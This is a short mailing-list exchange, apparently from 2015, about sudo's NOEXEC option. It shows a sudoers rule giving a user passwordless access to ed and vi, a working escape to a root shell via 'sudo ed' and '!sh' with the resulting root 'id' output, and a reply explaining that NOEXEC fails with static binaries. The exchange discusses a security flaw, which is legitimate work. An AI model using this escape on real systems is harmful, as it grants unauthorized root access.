On 2015-04-27, "whynot sudo" <whynots...@safe-mail.net> wrote:
> Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi > foouser LOCALHOST = NOPASSWD: NOEXEC: FOO > > Can the "foouser" escape to root prompt? Let's try! $ sudo ed !sh # id uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) # Yeah, that LD_PRELOAD trick NOEXEC uses doesn't work so well with static executables. -- Christian "naddy" Weisgerber na...@mips.inka.de
